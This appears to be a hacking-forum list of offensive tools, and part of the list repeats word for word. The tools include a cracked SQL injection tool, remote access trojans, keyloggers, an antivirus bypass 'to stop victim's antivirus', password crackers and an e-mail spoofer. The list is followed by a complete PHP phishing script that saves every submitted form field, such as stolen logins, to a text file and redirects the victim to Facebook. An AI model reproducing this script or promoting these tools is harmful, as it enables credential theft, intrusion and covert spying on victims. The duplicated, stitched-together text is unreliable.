1= IronWASP- (Advanced web vulnerability scanner)
2= Havij Pro 1.17 Cracked {Advance SQL Injection T00l}
3= OWASP Xenotix {Advance XSS Exploiter}
4= Web Cruiser Website attacker [web explotiation]
5= E-mail Spoofing attacker {PHP Script to Spoof E-mails}
6= WappEx 2.0 {Web App Exploitation T00l}
7= Backtrack 5 RC3 {Most Wanted Hacking OS}
8= Kali Linux {Bactrack 6 Hacking OS}
9= Dark Comet RAT legacy 5.4 {Hacking and Spying}
10= John The Ripper {Fastest Password Cracking Tool}
11= NT-SQL Invader {Web Exploitation T00l}
12= Backbox 3.0 {Penetration testing OS for Hackers}
13= B88 {Bypass and Stop Victim's Antivirus}
14= Ettercap 1.2 {Packet Sniffer and MITM}
15= Pro RAT 2.0 {Remote Access Trojan (Most wanted)}
16= 0G0 cPanel Password Cracker {CPanel Cracker}
17= Metasploit {Most wanted Computer Pentesting T00l}
18= SQL P0!Z0N v1.1 {Web Exploitation T00l}
19= Brutus2 {Brute Force attacker and Password Cracker}
20= Netbus Trojan 1.70 {RAT and Computer Hacking Tool}
21= Acunetix Web Vulnerability Scanner 8 {WVS & WET}
22= Blind Cat SQL Injection Cat Tool {Web Exploitation Tool}
23= Star Tools 2.0 {SET Tool}
24= SQL Power Injector {Web Exploitation Tool}
25= Skyneos Keylogger {SET and Spying Tool}
26= Emmissary Keylogger {SET and Spying Tool}
2= Havij Pro 1.17 Cracked {Advance SQL Injection T00l}
3= OWASP Xenotix {Advance XSS Exploiter}
4= Web Cruiser Website attacker [web explotiation]
5= E-mail Spoofing attacker {PHP Script to Spoof E-mails}
6= WappEx 2.0 {Web App Exploitation T00l}
7= Backtrack 5 RC3 {Most Wanted Hacking OS}
8= Kali Linux {Bactrack 6 Hacking OS}
9= Dark Comet RAT legacy 5.4 {Hacking and Spying}
10= John The Ripper {Fastest Password Cracking Tool}
11= NT-SQL Invader {Web Exploitation T00l}
12= Backbox 3.0 {Penetration testing OS for Hackers}
13= B88 {Bypass and Stop Victim's Antivirus}
14= Ettercap 1.2 {Packet Sniffer and MITM}
15= Pro RAT 2.0 {Remote Access Trojan (Most wanted)}
16= 0G0 cPanel Password Cracker {CPanel Cracker}
17= Metasploit {Most wanted Computer Pentesting T00l}
18= SQL P0!Z0N v1.1 {Web Exploitation T00l}
19= Brutus2 {Brute Force attacker and Password Cracker}
20= Netbus Trojan 1.70 {RAT and Computer Hacking Tool}
21= Acunetix Web Vulnerability Scanner 8 {WVS & WET}
22= Blind Cat SQL Injection Cat Tool {Web Exploitation Tool}
23= Star Tools 2.0 {SET Tool}
24= SQL Power Injector {Web Exploitation Tool}
25= Skyneos Keylogger {SET and Spying Tool}
26= Emmissary Keylogger {SET and Spying Tool}
<?php header ('Location:http://www.facebook.com/'); $handle = fopen("lolpwd.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
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